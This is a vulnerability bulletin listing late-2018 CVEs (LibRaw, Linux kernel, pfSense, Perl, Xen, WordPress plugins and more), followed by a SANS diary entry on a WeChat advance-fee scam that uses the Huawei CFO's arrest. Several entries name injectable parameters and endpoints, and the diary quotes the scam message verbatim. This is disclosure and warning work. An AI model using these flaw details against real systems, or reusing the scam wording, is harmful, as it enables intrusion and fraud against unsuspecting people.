libraw — libraw An error within the “nikon_coolscan_load_raw()” function (internal/dcraw_common.cpp) in LibRaw versions prior to 0.18.9 can be exploited to trigger a NULL pointer dereference. 2018-12-07 not yet calculated CVE-2018-5812
MISC
MISC
SECUNIA
MISC
UBUNTU
libraw — libraw A type confusion error within the “identify()” function (internal/dcraw_common.cpp) in LibRaw versions prior to 0.18.8 can be exploited to trigger a division by zero. 2018-12-07 not yet calculated CVE-2018-5804
MISC
MISC
SECUNIA
MISC
libraw — libraw An error within the “parse_minolta()” function (dcraw/dcraw.c) in LibRaw versions prior to 0.18.11 can be exploited to trigger an infinite loop via a specially crafted file. 2018-12-07 not yet calculated CVE-2018-5813
MISC
MISC
SECUNIA
MISC
UBUNTU
libraw — libraw An error within the “rollei_load_raw()” function (internal/dcraw_common.cpp) in LibRaw versions prior to 0.18.9 can be exploited to cause a heap-based buffer overflow and subsequently cause a crash. 2018-12-07 not yet calculated CVE-2018-5810
MISC
MISC
SECUNIA
MISC
UBUNTU
libraw — libraw An error within the “nikon_coolscan_load_raw()” function (internal/dcraw_common.cpp) in LibRaw versions prior to 0.18.9 can be exploited to cause an out-of-bounds read memory access and subsequently cause a crash. 2018-12-07 not yet calculated CVE-2018-5811
MISC
MISC
SECUNIA
MISC
UBUNTU
libraw — libraw An off-by-one error within the “LibRaw::kodak_ycbcr_load_raw()” function (internal/dcraw_common.cpp) in LibRaw versions prior to 0.18.7 can be exploited to cause a heap-based buffer overflow and subsequently cause a crash. 2018-12-07 not yet calculated CVE-2018-5800
BID
REDHAT
MISC
MISC
SECUNIA
MISC
UBUNTU
libraw — libraw An error related to the “LibRaw::panasonic_load_raw()” function (dcraw_common.cpp) in LibRaw versions prior to 0.18.6 can be exploited to cause a heap-based buffer overflow and subsequently cause a crash via a specially crafted TIFF image. 2018-12-07 not yet calculated CVE-2017-16909
MISC
MISC
SECUNIA
MISC
UBUNTU
linux — linux_kernel In the Linux kernel through 4.19.6, a local user could exploit a use-after-free in the ALSA driver by supplying a malicious USB Sound device (with zero interfaces) that is mishandled in usb_audio_probe in sound/usb/card.c. 2018-12-03 not yet calculated CVE-2018-19824
BID
MISC
MISC
MISC
linux — linux_kernel An issue was discovered in the Linux kernel before 4.19.3. crypto_report_one() and related functions in crypto/crypto_user.c (the crypto user configuration API) do not fully initialize structures that are copied to userspace, potentially leaking sensitive memory to user programs. NOTE: this is a CVE-2013-2547 regression but with easier exploitability because the attacker does not need a capability (however, the system must have the CONFIG_CRYPTO_USER kconfig option). 2018-12-04 not yet calculated CVE-2018-19854
MISC
MISC
MISC
litespeed_technologies — openlitespeed The server in LiteSpeed OpenLiteSpeed before 1.5.0 RC6 allows local users to cause a denial of service (buffer overflow) or possibly have unspecified other impact by creating a symlink through which the openlitespeed program can be invoked with a long command name (involving ../ characters), which is mishandled in the LshttpdMain::getServerRootFromExecutablePath function. 2018-12-03 not yet calculated CVE-2018-19792
MISC
litespeed_technologies — openlitespeed The server in LiteSpeed OpenLiteSpeed before 1.5.0 RC6 does not correctly handle requests for byte sequences, allowing an attacker to amplify the response size by requesting the entire response body repeatedly, as demonstrated by an HTTP Range header value beginning with the “bytes=0-,0-” substring. 2018-12-03 not yet calculated CVE-2018-19791
MISC
lxml — lxml An issue was discovered in lxml before 4.2.5. lxml/html/clean.py in the lxml.html.clean module does not remove javascript: URLs that use escaping, allowing a remote attacker to conduct XSS attacks, as demonstrated by “j a v a s c r i p t:” in Internet Explorer. This is a similar issue to CVE-2014-3146. 2018-12-02 not yet calculated CVE-2018-19787
MISC
mcafee — true_key Privilege Escalation vulnerability in Microsoft Windows client in McAfee True Key (TK) 5.1.230.7 and earlier allows local users to execute arbitrary code via specially crafted malware. 2018-12-06 not yet calculated CVE-2018-6757
CONFIRM
mcafee — true_key Authentication Abuse vulnerability in Microsoft Windows client in McAfee True Key (TK) 5.1.230.7 and earlier allows local users to execute unauthorized commands via specially crafted malware. 2018-12-06 not yet calculated CVE-2018-6756
CONFIRM
mcafee — true_key Weak Directory Permission Vulnerability in Microsoft Windows client in McAfee True Key (TK) 5.1.230.7 and earlier allows local users to execute arbitrary code via specially crafted malware. 2018-12-06 not yet calculated CVE-2018-6755
CONFIRM
metinfo — metinfo In Metinfo 6.1.3, include/interface/applogin.php allows setting arbitrary HTTP headers (including the Cookie header), and common.inc.php allows registering variables from the $_COOKIE value. This issue can, for example, be exploited in conjunction with CVE-2018-19835 to bypass many XSS filters such as the Chrome XSS filter. 2018-12-03 not yet calculated CVE-2018-19836
MISC
misp — misp An issue was discovered in MISP 2.4.9x before 2.4.99. In app/Model/Event.php (the STIX 1 import code), an unescaped filename string is used to construct a shell command. This vulnerability can be abused by a malicious authenticated user to execute arbitrary commands by tweaking the original filename of the STIX import. 2018-12-06 not yet calculated CVE-2018-19908
MISC
MISC
moxa — nport_w2x50a An exploitable authenticated command-injection vulnerability exists in the web server functionality of Moxa NPort W2x50A products with firmware before 2.2 Build_18082311. A specially crafted HTTP POST request to /goform/webSettingProfileSecurity can result in running OS commands as the root user. 2018-12-06 not yet calculated CVE-2018-19660
MISC
FULLDISC
moxa — nport_w2x50a An exploitable authenticated command-injection vulnerability exists in the web server functionality of Moxa NPort W2x50A products with firmware before 2.2 Build_18082311. A specially crafted HTTP POST request to /goform/net_WebPingGetValue can result in running OS commands as the root user. This is similar to CVE-2017-12120. 2018-12-06 not yet calculated CVE-2018-19659
MISC
FULLDISC
netapp — data_ontap Data ONTAP operating in 7-Mode versions prior to 8.2.5P2 are susceptible to a vulnerability which discloses sensitive information to an unauthorized user. 2018-12-04 not yet calculated CVE-2018-5496
CONFIRM
netgate — pfsense_ce An exploitable command injection vulnerability exists in the way Netgate pfSense CE 2.4.4-RELEASE processes the parameters of a specific POST request. The attacker can exploit this and gain the ability to execute arbitrary commands on the system. An attacker needs to be able to send authenticated POST requests to the administration web interface. Command injection is possible in the `powerd_normal_mode` parameter. 2018-12-03 not yet calculated CVE-2018-4019
MISC
netgate — pfsense_ce An exploitable command injection vulnerability exists in the way Netgate pfSense CE 2.4.4-RELEASE processes the parameters of a specific POST request. The attacker can exploit this and gain the ability to execute arbitrary commands on the system. An attacker needs to be able to send authenticated POST requests to the administration web interface. Command injection is possible in the `powerd_battery_mode` POST parameter. 2018-12-03 not yet calculated CVE-2018-4021
MISC
netgate — pfsense_ce An exploitable command injection vulnerability exists in the way Netgate pfSense CE 2.4.4-RELEASE processes the parameters of a specific POST request. The attacker can exploit this and gain the ability to execute arbitrary commands on the system. An attacker needs to be able to send authenticated POST requests to the administration web interface. Command injection is possible in the `powerd_ac_mode` POST parameter. 2018-12-03 not yet calculated CVE-2018-4020
MISC
nice_incontact — multiple_products Two stack-based buffer overflow vulnerabilities have been discovered in CX-One Versions 4.42 and prior (CX-Programmer Versions 9.66 and prior and CX-Server Versions 5.0.23 and prior). When processing project files, the application allows input data to exceed the buffer. An attacker could use a specially crafted project file to overflow the buffer and execute code under the privileges of the application. 2018-12-04 not yet calculated CVE-2018-18993
BID
MISC
nice_incontact — multiple_products In CX-One Versions 4.42 and prior (CX-Programmer Versions 9.66 and prior and CX-Server Versions 5.0.23 and prior), when processing project files, the application fails to check if it is referencing freed memory. An attacker could use a specially crafted project file to exploit and execute code under the privileges of the application. 2018-12-04 not yet calculated CVE-2018-18989
BID
MISC
norton — password_manger_for_android Norton Password Manager for Android (formerly Norton Identity Safe) may be susceptible to a cross site scripting (XSS) exploit, which is a type of issue that can enable attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to potentially bypass access controls such as the same-origin policy. 2018-12-06 not yet calculated CVE-2018-18362
BID
CONFIRM
nuuo — nvrmini2 NUUO NVRmini2 Network Video Recorder firmware through 3.9.1 allows remote attackers to execute arbitrary code or cause a denial of service (buffer overflow), resulting in ability to read camera feeds or reconfigure the device. 2018-12-05 not yet calculated CVE-2018-19864
MISC
MISC
nuuo — nvrmini2 NUUO NVRMini2 version 3.9.1 is vulnerable to authenticated remote command injection. An attacker can send crafted requests to upgrade_handle.php to execute OS commands as root. 2018-11-30 not yet calculated CVE-2018-15716
BID
MISC
EXPLOIT-DB
MISC
onionshare — onionshare The debug_mode function in web/web.py in OnionShare through 1.3.1, when --debug is enabled, uses the /tmp/onionshare_server.log pathname for logging, which might allow local users to overwrite files or obtain sensitive information by using this pathname. 2018-12-07 not yet calculated CVE-2018-19960
MISC
openrefine — openrefine OpenRefine before 3.5 allows directory traversal via a relative pathname in a ZIP archive. 2018-12-05 not yet calculated CVE-2018-19859
MISC
osb — vt-designer VT-Designer Version 2.1.7.31 is vulnerable because the program reads the contents of a file (which is already in memory) into another heap-based buffer, which may cause the program to crash or allow remote code execution. 2018-11-30 not yet calculated CVE-2018-18983
BID
MISC
osb — vt-designer VT-Designer Version 2.1.7.31 is vulnerable because the program populates objects with user-supplied input from a file without first checking it for validity, allowing attacker-supplied input to be written to known memory locations. This may cause the program to crash or allow remote code execution. 2018-11-30 not yet calculated CVE-2018-18987
BID
MISC
perl — perl Perl before 5.26.3 and 5.28.0 before 5.28.1 has a buffer overflow via a crafted regular expression that triggers invalid write operations. 2018-12-05 not yet calculated CVE-2018-18312
SECTRACK
CONFIRM
FEDORA
CONFIRM
CONFIRM
CONFIRM
UBUNTU
DEBIAN
perl — perl Perl before 5.26.3 has a buffer overflow via a crafted regular expression that triggers invalid write operations. 2018-12-07 not yet calculated CVE-2018-18314
SECTRACK
CONFIRM
CONFIRM
FEDORA
CONFIRM
CONFIRM
UBUNTU
DEBIAN
perl — perl Perl before 5.26.3 and 5.28.x before 5.28.1 has a buffer overflow via a crafted regular expression that triggers invalid write operations. 2018-12-07 not yet calculated CVE-2018-18311
SECTRACK
CONFIRM
CONFIRM
MLIST
FEDORA
CONFIRM
CONFIRM
CONFIRM
UBUNTU
UBUNTU
DEBIAN
perl — perl Perl before 5.26.3 has a buffer over-read via a crafted regular expression that triggers disclosure of sensitive information from process memory. 2018-12-07 not yet calculated CVE-2018-18313
SECTRACK
CONFIRM
CONFIRM
FEDORA
CONFIRM
CONFIRM
UBUNTU
UBUNTU
DEBIAN
philips — healthsuite_health_android_app Philips HealthSuite Health Android App, all versions. The software uses simple encryption that is not strong enough for the level of protection required. 2018-12-07 not yet calculated CVE-2018-19001
BID
MISC
php — php ext/imap/php_imap.c in PHP 5.x and 7.x before 7.3.0 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via an empty string in the message argument to the imap_mail function. 2018-12-07 not yet calculated CVE-2018-19935
MISC
pixelimity_cms — pixelimity_cms Pixelimity 1.0 has Persistent XSS via the admin/portfolio.php data[title] parameter, as demonstrated by a crafted onload attribute of an SVG element. 2018-12-06 not yet calculated CVE-2018-19919
MISC
pluck — pluck Pluck v4.7.7 allows CSRF via admin.php?action=settings. 2018-12-04 not yet calculated CVE-2018-16634
MISC
pluck — pluck Pluck v4.7.7 allows XSS via the admin.php?action=editpage&page= page title. 2018-12-04 not yet calculated CVE-2018-16633
MISC
policykit/polkit — policykit/polkit A flaw was found in PolicyKit (aka polkit) 0.115 that allows a user with a uid greater than INT_MAX to successfully execute any systemctl command. 2018-12-03 not yet calculated CVE-2018-19788
MISC
MISC
DEBIAN
powerdns — recursor An issue has been found in PowerDNS Recursor before version 4.1.8 where a remote attacker sending a DNS query can trigger an out-of-bounds memory read while computing the hash of the query for a packet cache lookup, possibly leading to a crash. 2018-12-03 not yet calculated CVE-2018-16855
CONFIRM
MISC
proxygen — proxygen A potential denial-of-service issue exists in the Proxygen handling of invalid HTTP2 settings, which can cause the server to spend disproportionate resources. This affects all supported versions of HHVM (3.24.3 and 3.21.7 and below) when using the proxygen server to handle HTTP2 requests. 2018-12-03 not yet calculated CVE-2018-6332
MISC
python — simplehttpserver A Path Traversal in simplehttpserver versions <=0.2.1 allows an attacker to list any file in another folder of the web root. 2018-12-04 not yet calculated CVE-2018-16478
MISC
qemu — qemu The Bluetooth subsystem in QEMU mishandles negative values for length variables, leading to memory corruption. 2018-12-06 not yet calculated CVE-2018-19665
MLIST
BID
MLIST
qt — qt A keystroke logging issue was discovered in Virtual Keyboard in Qt 5.7.x, 5.8.x, 5.9.x, 5.10.x, and 5.11.x before 5.11.3. 2018-12-05 not yet calculated CVE-2018-19865
MISC
MISC
MISC
MISC
MISC
MISC
MISC
MISC
MISC
MISC
MISC
qualcomm — android In all Android releases (Android for MSM, Firefox OS for MSM, QRD Android) from CAF using the Linux kernel, a possible buffer overflow exists in a WLAN function due to lack of input validation of values received from firmware. 2018-12-07 not yet calculated CVE-2018-11905
BID
CONFIRM
qualcomm — android In all Android releases (Android for MSM, Firefox OS for MSM, QRD Android) from CAF using the Linux kernel, userspace can pass IEs to the host driver, and if multiple append commands are received, the integer variable that stores the length can overflow and the subsequent copy of the IE data may potentially lead to a heap buffer overflow. 2018-12-07 not yet calculated CVE-2017-14888
CONFIRM
CONFIRM
qualcomm — android In all Android releases (Android for MSM, Firefox OS for MSM, QRD Android) from CAF using the Linux kernel, while processing the RIC Data Descriptor IE in an artificially crafted 802.11 frame with an IE length greater than 255, an infinite loop may potentially occur, resulting in a denial of service. 2018-12-07 not yet calculated CVE-2017-15835
CONFIRM
CONFIRM
quicken — quicken_deluxe_2018_for_mac An exploitable information disclosure vulnerability exists in the password protection functionality of Quicken Deluxe 2018 for Mac version 5.2.2. A specially crafted sqlite3 request can cause the removal of the password protection, allowing an attacker to access and modify the data without knowing the password. An attacker needs to have access to the password-protected files to trigger this vulnerability. 2018-12-03 not yet calculated CVE-2018-3854
MISC
radare — radare2 opmov in libr/asm/p/asm_x86_nz.c in radare2 before 3.1.0 allows attackers to cause a denial of service (buffer over-read) via crafted x86 assembly data, as demonstrated by rasm2. 2018-12-04 not yet calculated CVE-2018-19843
MISC
MISC
radare — radare2 getToken in libr/asm/p/asm_x86_nz.c in radare2 before 3.1.0 allows attackers to cause a denial of service (stack-based buffer over-read) via crafted x86 assembly data, as demonstrated by rasm2. 2018-12-04 not yet calculated CVE-2018-19842
MISC
MISC
red_hat — enterprise_linux A Bleichenbacher type side-channel based padding oracle attack was found in the way nettle handles endian conversion of RSA decrypted PKCS#1 v1.5 data. An attacker who is able to run a process on the same physical core as the victim process could use this flaw to extract plaintext or in some cases downgrade any TLS connections to a vulnerable server. 2018-12-03 not yet calculated CVE-2018-16869
MISC
BID
CONFIRM
red_hat — enterprise_linux A Bleichenbacher type side-channel based padding oracle attack was found in the way gnutls handles verification of RSA decrypted PKCS#1 v1.5 data. An attacker who is able to run a process on the same physical core as the victim process could use this to extract plaintext or in some cases downgrade any TLS connections to a vulnerable server. 2018-12-03 not yet calculated CVE-2018-16868
MISC
BID
CONFIRM
red_hat — enterprise_linux_7 It was found that RHSA-2018:2918 did not fully fix CVE-2018-16509. An attacker could possibly exploit another variant of the flaw and bypass the -dSAFER protection to, for example, execute arbitrary shell commands via a specially crafted PostScript document. This only affects ghostscript 9.07 as shipped with Red Hat Enterprise Linux 7. 2018-12-03 not yet calculated CVE-2018-16863
CONFIRM
CONFIRM
CONFIRM
CONFIRM
REDHAT
CONFIRM
rockwell_automation — micrologix_1400_controllers_and_1756_controllogix_communications_modules Rockwell Automation MicroLogix 1400 Controllers and 1756 ControlLogix Communications Modules. An unauthenticated, remote threat actor could send a CIP connection request to an affected device, and upon successful connection, send a new IP configuration to the affected device even if the controller in the system is set to Hard RUN mode. When the affected device accepts this new IP configuration, a loss of communication occurs between the device and the rest of the system as the system traffic is still attempting to communicate with the device via the overwritten IP address. 2018-12-07 not yet calculated CVE-2018-17924
BID
MISC
sales_and_company_management_system — sales_and_company_management_system An issue was discovered in Sales & Company Management System (SCMS) through 2018-06-06. It has SQL injection via the member/member_order.php type parameter, related to the O_state parameter. 2018-12-06 not yet calculated CVE-2018-19925
MISC
sales_and_company_management_system — sales_and_company_management_system An issue was discovered in Sales & Company Management System (SCMS) through 2018-06-06. An email address can be modified in between the request for a validation code and the entry of the validation code, leading to storage of an XSS payload contained in the modified address. 2018-12-06 not yet calculated CVE-2018-19924
MISC
sales_and_company_management_system — sales_and_company_management_system An issue was discovered in Sales & Company Management System (SCMS) through 2018-06-06. There is member/member_email.php?action=edit CSRF. 2018-12-06 not yet calculated CVE-2018-19923
MISC
santa_cruz_operation — tarantella_enterprise Tarantella Enterprise before 3.11 allows Directory Traversal. 2018-12-05 not yet calculated CVE-2018-19753
MISC
FULLDISC
santa_cruz_operation — tarantella_enterprise Tarantella Enterprise before 3.11 allows bypassing Access Control. 2018-12-05 not yet calculated CVE-2018-19754
MISC
FULLDISC
sass — libsass In LibSass prior to 3.5.5, functions inside ast.cpp for IMPLEMENT_AST_OPERATORS expansion allow attackers to cause a denial-of-service resulting from stack consumption via a crafted sass file, as demonstrated by recursive calls involving clone(), cloneChildren(), and copy(). 2018-12-04 not yet calculated CVE-2018-19838
MISC
sass — libsass In LibSass 3.5.5, a NULL Pointer Dereference in the function Sass::Selector_List::populate_extends in SharedPtr.hpp (used by ast.cpp and ast_selectors.cpp) may cause a Denial of Service (application crash) via a crafted sass input file. 2018-12-03 not yet calculated CVE-2018-19797
MISC
sass — libsass In LibSass prior to 3.5.5, Sass::Eval::operator()(Sass::Binary_Expression*) inside eval.cpp allows attackers to cause a denial-of-service resulting from stack consumption via a crafted sass file, because of certain incorrect parsing of ‘%’ as a modulo operator in parser.cpp. 2018-12-04 not yet calculated CVE-2018-19837
MISC
MISC
sass — libsass In LibSass prior to 3.5.5, the function handle_error in sass_context.cpp allows attackers to cause a denial-of-service resulting from a heap-based buffer over-read via a crafted sass file. 2018-12-04 not yet calculated CVE-2018-19839
MISC
MISC
sass — libsass In LibSass 3.5.5, a use-after-free vulnerability exists in the SharedPtr class in SharedPtr.cpp (or SharedPtr.hpp) that may cause a denial of service (application crash) or possibly have unspecified other impact. 2018-12-03 not yet calculated CVE-2018-19827
MISC
sass — libsass In inspect.cpp in LibSass 3.5.5, a high memory footprint caused by an endless loop (containing a Sass::Inspect::operator()(Sass::String_Quoted*) stack frame) may cause a Denial of Service via crafted sass input files with stray ‘&’ or ‘/’ characters. 2018-12-03 not yet calculated CVE-2018-19826
MISC
solarwinds — sftp/scp_server In SolarWinds SFTP/SCP server through 2018-09-10, the configuration file is world readable and writable, and stores user passwords in an insecure manner, allowing an attacker to determine passwords for potentially privileged accounts. This also grants the attacker an ability to backdoor the server. 2018-12-05 not yet calculated CVE-2018-16791
FULLDISC
solarwinds — sftp/scp_server SolarWinds SFTP/SCP server through 2018-09-10 is vulnerable to XXE via a world readable and writable configuration file that allows an attacker to exfiltrate data. 2018-12-05 not yet calculated CVE-2018-16792
FULLDISC
spidercontrol — scada_webserver Reflected cross-site scripting (non-persistent) in SCADA WebServer (Versions prior to 2.03.0001) could allow an attacker to send a crafted URL that contains JavaScript, which can be reflected off the web application to the victim’s browser. 2018-12-04 not yet calculated CVE-2018-18991
BID
MISC
thinkcmf — thinkcmf ThinkCMF X2.2.2 has SQL Injection via the method edit_post in ArticleController.class.php and is exploitable by normal authenticated users via the post[id][1] parameter in an article edit_post action. 2018-12-05 not yet calculated CVE-2018-19898
MISC
thinkcmf — thinkcmf ThinkCMF X2.2.2 has SQL Injection via the function edit_post() in NavController.class.php and is exploitable with the manager privilege via the parentid parameter in a nav action. 2018-12-05 not yet calculated CVE-2018-19895
MISC
thinkcmf — thinkcmf ThinkCMF X2.2.2 has SQL Injection via the function delete() in SlideController.class.php and is exploitable with the manager privilege via the ids[] parameter in a slide action. 2018-12-05 not yet calculated CVE-2018-19896
MISC
thinkcmf — thinkcmf ThinkCMF X2.2.2 has SQL Injection via the function _listorders() in AdminbaseController.class.php and is exploitable with the manager privilege via the listorders[key][1] parameter in a Link listorders action. 2018-12-05 not yet calculated CVE-2018-19897
MISC
thinkcmf — thinkcmf ThinkCMF X2.2.2 has SQL Injection via the functions check() and delete() in CommentadminController.class.php and is exploitable with the manager privilege via the ids[] parameter in a commentadmin action. 2018-12-05 not yet calculated CVE-2018-19894
MISC
videolan — vlc_media_player The CAF demuxer in modules/demux/caf.c in VideoLAN VLC media player 3.0.4 may read memory from an uninitialized pointer when processing magic cookies in CAF files, because a ReadKukiChunk() cast converts a return value to an unsigned int even if that value is negative. This could result in a denial of service and/or a potential infoleak. 2018-12-05 not yet calculated CVE-2018-19857
BID
MISC
MISC
vmware — esxi VMware ESXi 6.7 without ESXi670-201811401-BG and VMware ESXi 6.5 without ESXi650-201811301-BG contain uninitialized stack memory usage in the vmxnet3 virtual network adapter which may lead to an information leak from host to guest. 2018-12-04 not yet calculated CVE-2018-6982
BID
SECTRACK
CONFIRM
vmware — multiple_products VMware ESXi 6.7 without ESXi670-201811401-BG and VMware ESXi 6.5 without ESXi650-201811301-BG, VMware ESXi 6.0 without ESXi600-201811401-BG, VMware Workstation 15, VMware Workstation 14.1.3 or below, VMware Fusion 11, VMware Fusion 10.1.3 or below contain uninitialized stack memory usage in the vmxnet3 virtual network adapter which may allow a guest to execute code on the host. 2018-12-04 not yet calculated CVE-2018-6981
BID
SECTRACK
SECTRACK
CONFIRM
wavpack — wavpack The function WavpackPackInit in pack_utils.c in libwavpack.a in WavPack through 5.1.0 allows attackers to cause a denial-of-service (resource exhaustion caused by an infinite loop) via a crafted wav audio file because WavpackSetConfiguration64 mishandles a sample rate of zero. 2018-12-04 not yet calculated CVE-2018-19840
MISC
MISC
UBUNTU
wavpack — wavpack The function WavpackVerifySingleBlock in open_utils.c in libwavpack.a in WavPack through 5.1.0 allows attackers to cause a denial-of-service (out-of-bounds read and application crash) via a crafted WavPack Lossless Audio file, as demonstrated by wvunpack. 2018-12-04 not yet calculated CVE-2018-19841
MISC
MISC
UBUNTU
wordpress — wordpress An open redirect in the Ninja Forms plugin before 3.3.19.1 for WordPress allows Remote Attackers to redirect a user via the lib/StepProcessing/step-processing.php (aka submissions download page) redirect parameter. 2018-12-03 not yet calculated CVE-2018-19796
MISC
MISC
wordpress — wordpress There is a reflected XSS vulnerability in WordPress Arigato Autoresponder and Newsletter v2.5.1.8. This vulnerability requires administrative privileges to exploit. 2018-12-03 not yet calculated CVE-2018-1002001
MISC
MISC
EXPLOIT-DB
wordpress — wordpress There is blind SQL injection in WordPress Arigato Autoresponder and Newsletter v2.5.1.8 These vulnerabilities require administrative privileges to exploit. There is an exploitable blind SQL injection vulnerability via the del_ids variable by POST request. 2018-12-03 not yet calculated CVE-2018-1002000
MISC
MISC
EXPLOIT-DB
wordpress — wordpress There is a reflected XSS vulnerability in WordPress Arigato Autoresponder and Newsletter v2.5.1.8. This vulnerability requires administrative privileges to exploit. 2018-12-03 not yet calculated CVE-2018-1002003
MISC
MISC
EXPLOIT-DB
wordpress — wordpress There is a reflected XSS vulnerability in WordPress Arigato Autoresponder and Newsletter v2.5.1.8. This vulnerability requires administrative privileges to exploit. 2018-12-03 not yet calculated CVE-2018-1002002
MISC
MISC
EXPLOIT-DB
wordpress — wordpress These vulnerabilities require administrative privileges to exploit. There is an XSS vulnerability in bft_list.html.php:43: via the filter_signup_date parameter. 2018-12-03 not yet calculated CVE-2018-1002005
MISC
MISC
EXPLOIT-DB
wordpress — wordpress There is a reflected XSS vulnerability in WordPress Arigato Autoresponder and Newsletter v2.5.1.8. This vulnerability requires administrative privileges to exploit. 2018-12-03 not yet calculated CVE-2018-1002004
MISC
MISC
EXPLOIT-DB
wordpress — wordpress There is a reflected XSS vulnerability in WordPress Arigato Autoresponder and Newsletter v2.5.1.8. This vulnerability requires administrative privileges to exploit. There is an XSS vulnerability in integration-contact-form.html.php:15: via the POST request variable html_id. 2018-12-03 not yet calculated CVE-2018-1002007
MISC
MISC
EXPLOIT-DB
wordpress — wordpress There is a reflected XSS vulnerability in WordPress Arigato Autoresponder and Newsletter v2.5.1.8. This vulnerability requires administrative privileges to exploit. There is an XSS vulnerability in list-user.html.php:4: via the GET request offset variable. 2018-12-03 not yet calculated CVE-2018-1002008
MISC
MISC
EXPLOIT-DB
wordpress — wordpress There is a reflected XSS vulnerability in WordPress Arigato Autoresponder and Newsletter v2.5.1.8. This vulnerability requires administrative privileges to exploit. There is an XSS vulnerability in unsubscribe.html.php:3: via a GET request to the email variable. 2018-12-03 not yet calculated CVE-2018-1002009
MISC
MISC
EXPLOIT-DB
wordpress — wordpress These vulnerabilities require administrative privileges to exploit. There is an XSS vulnerability in integration-contact-form.html.php:14: via the POST request variable classes. 2018-12-03 not yet calculated CVE-2018-1002006
MISC
MISC
EXPLOIT-DB
wordpress — wordpress login.php in Adiscon LogAnalyzer before 4.1.7 has XSS via the Login Button Referer field. 2018-12-05 not yet calculated CVE-2018-19877
MISC
EXPLOIT-DB
xen — xen An issue was discovered in Xen through 4.11.x allowing 64-bit PV guest OS users to cause a denial of service (host OS crash) because #GP[0] can occur after a non-canonical address is passed to the TLB flushing code. NOTE: this issue exists because of an incorrect CVE-2017-5754 (aka Meltdown) mitigation. 2018-12-07 not yet calculated CVE-2018-19965
MISC
xen — xen An issue was discovered in Xen through 4.11.x allowing x86 PV guest OS users to cause a denial of service (host OS crash) or possibly gain host OS privileges because of an interpretation conflict for a union data structure associated with shadow paging. NOTE: this issue exists because of an incorrect fix for CVE-2017-15595. 2018-12-07 not yet calculated CVE-2018-19966
MISC
xen — xen An issue was discovered in Xen 4.11.x allowing x86 guest OS users to cause a denial of service (host OS hang) because the p2m lock remains unavailable indefinitely in certain error conditions. 2018-12-07 not yet calculated CVE-2018-19964
MISC
xen — xen An issue was discovered in Xen 4.11 allowing HVM guest OS users to cause a denial of service (host OS crash) or possibly gain host OS privileges because x86 IOREQ server resource accounting (for external emulators) was mishandled. 2018-12-07 not yet calculated CVE-2018-19963
MISC
xen — xen An issue was discovered in Xen through 4.11.x on AMD x86 platforms, possibly allowing guest OS users to gain host OS privileges because small IOMMU mappings are unsafely combined into larger ones. 2018-12-07 not yet calculated CVE-2018-19962
MISC
xen — xen An issue was discovered in Xen through 4.11.x on AMD x86 platforms, possibly allowing guest OS users to gain host OS privileges because TLB flushes do not always occur after IOMMU mapping changes. 2018-12-07 not yet calculated CVE-2018-19961
MISC
xen — xen An issue was discovered in Xen through 4.11.x on Intel x86 platforms allowing guest OS users to cause a denial of service (host OS hang) because Xen does not work around Intel’s mishandling of certain HLE transactions associated with the KACQUIRE instruction prefix. 2018-12-07 not yet calculated CVE-2018-19967
MISC
xiaomi — daisy-o-miss_mi_a2_lite_and_redmi6_devices The Goodix GT9xx touchscreen driver for custom Linux kernels on Xiaomi daisy-o-oss Mi A2 Lite and RedMi6 pro devices through 2018-08-27 has a NULL pointer dereference in kfree after a kmalloc failure in gtp_read_Color in drivers/input/touchscreen/gt917d/gt9xx.c. 2018-12-07 not yet calculated CVE-2018-19939
MISC
yunohost — yunohost Two XSS vulnerabilities are located in the profile edition page of the user panel of the YunoHost 2.7.2 through 2.7.14 web application. By injecting a JavaScript payload, these flaws could be used to manipulate a user’s session. 2018-12-04 not yet calculated CVE-2018-11348
MISC
yunohost — yunohost The YunoHost 2.7.2 through 2.7.14 web application is affected by an HTTP response header injection. This flaw allows an attacker to inject one or more HTTP headers into the response from the server. It requires user interaction, since the malicious link must be sent to the victim. It could be used to perform other attacks such as redirecting the user to a malicious website, HTTP response splitting, or HTTP cache poisoning. 2018-12-04 not yet calculated CVE-2018-11347
MISC
yzmcms — yzmcms An issue was discovered in YzmCMS 5.2. XSS exists via the admin/content/search.html searinfo parameter. 2018-12-04 not yet calculated CVE-2018-19849
MISC
zenitel — ip-stationweb Zenitel Norway IP-StationWeb before 4.2.3.9 allows stored XSS via the Display Name for Station Status or Account Settings, related to the goform/zForm_save_changes sip_nick parameter. The password of alphaadmin for the admin account may be used for authentication in some cases. 2018-12-06 not yet calculated CVE-2018-19927
MISC
zenitel — ip-stationweb Zenitel Norway IP-StationWeb before 4.2.3.9 allows reflected XSS via the goform/ PATH_INFO. 2018-12-06 not yet calculated CVE-2018-19926
MISC
zoho_manageengine — opmanager Zoho ManageEngine OpManager 12.3 before 123237 has XSS in the domain controller. 2018-12-06 not yet calculated CVE-2018-19921
MISC
zte — zxin10_routers All versions up to ZXINOS-RESV1.01.43 of the ZTE ZXIN10 product Orange branch are affected by an improper access control vulnerability. Due to improper access control on the devcomm process, an unauthorized remote attacker can exploit this vulnerability to execute arbitrary code with root privileges. 2018-12-07 not yet calculated CVE-2018-7364
CONFIRM

This product is provided subject to this Notification and this Privacy & Use policy.

Arrest of Huawei CFO Inspires Advanced Fee Scam, (Sun, Dec 9th)

Last week, the arrest of MENG Wanzou made big waves in the news. Ms. Meng was arrested in Canada on an arrest warrant issued on behalf of the United States Department of Justice. Ms. Meng, as CFO of Huawei and possible heir to her father, the CEO of Huawei, is assumed to have access to substantial wealth. This led to a wave of advanced fee scams leveraging this news.

Advanced fee scams have probably been most commonly associated with “Nigerian Prince” scams. The trick is to promise substantial wealth in exchange for a relatively small advanced fee.

In this case, the message sent via WeChat suggested that a corrupt Canadian guard would let Ms. Meng escape for a few thousand dollars. The recipient of the message is asked to transfer the money to the guard’s account, and is promised a large amount of money once Ms. Meng is released:

Translation: “Hello, I am MENG Wanzou. Currently, I have been detained by Canadian customs. I have limited use of my phone. Right now CIA is trying to get me into the hands of the US government. I bribed the guard of my room, and urgently need US$2000 to get out of here. Once I am out, I will reward you 200,000 shares of Huawei.  I will be good on my word. if you are single, we can also discuss the important thing in life. The guard’s name is David, the account number is 52836153836252, swift 55789034. I will be good on my word”

Of course, it is questionable how successful a crude attempt like this will be. But sadly, experience tells us that there are still people falling for the old “Nigerian scam”. By targeting Chinese individuals via WeChat, the scam may have a higher success rate than more widely distributed scams.


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

